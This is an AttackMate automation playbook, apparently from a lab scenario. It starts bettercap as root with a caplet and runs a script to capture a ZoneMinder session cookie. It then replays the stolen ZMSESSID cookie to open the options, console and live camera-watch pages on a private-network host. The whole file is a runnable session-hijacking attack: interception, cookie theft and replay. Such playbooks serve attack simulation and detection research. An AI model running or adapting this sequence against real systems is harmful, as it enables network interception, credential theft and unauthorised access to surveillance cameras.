####################
#
# Scenario 5 - AttackMate playbook
#
####################
# noinspection YAMLSchemaValidation
commands:
  - type: shell
    cmd: sudo bettercap -caplet bettercap.cap
    background: True
    kill_on_exit: False

  - type: shell
    cmd: sudo /bin/python3 /home/aecid/scenario5/get_cookie.py

  - type: setvar
    cmd: $RESULT_STDOUT
    variable: SESSION_ID

  - type: debug
    cmd: $SESSION_ID

  - type: shell
    cmd: sudo pkill -9 -f "bettercap -caplet bettercap.cap"

  - type: sleep
    seconds: 5

  - type: http-client
    cmd: GET
    url: http://172.17.100.121/zm/?view=options
    headers:
      Host: "172.17.100.121"
      Connection: "keep-alive"
      Origin: "http://172.17.100.121"
      User-Agent: "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/129.0.0.0 Safari/537.36"
      Accept: "*/*"
      Referer: "http://172.17.100.121/zm/?view=login"
      Accept-Encoding: "gzip, deflate"
    cookies:
      zmSkin: "classic"
      zmCSS: "base"
      ZMSESSID: $SESSION_ID
    follow: True

  - type: http-client
    cmd: GET
    url: http://172.17.100.121/zm/?view=console
    headers:
      Host: "172.17.100.121"
      Connection: "keep-alive"
      Origin: "http://172.17.100.121"
      User-Agent: "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/129.0.0.0 Safari/537.36"
      Accept: "*/*"
      Referer: "http://172.17.100.121/zm/?view=login"
      Accept-Encoding: "gzip, deflate"
    cookies:
      zmSkin: "classic"
      zmCSS: "base"
      ZMSESSID: $SESSION_ID
    follow: True

  - type: http-client
    cmd: GET
    url: http://172.17.100.121/zm/index.php?view=watch&mid=1
    headers:
      Host: "172.17.100.121"
      Connection: "keep-alive"
      Origin: "http://172.17.100.121"
      User-Agent: "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/129.0.0.0 Safari/537.36"
      Accept: "*/*"
      Referer: "http://172.17.100.121/zm/?view=login"
      Accept-Encoding: "gzip, deflate"
    cookies:
      zmSkin: "classic"
      zmCSS: "base"
      ZMSESSID: $SESSION_ID
    follow: True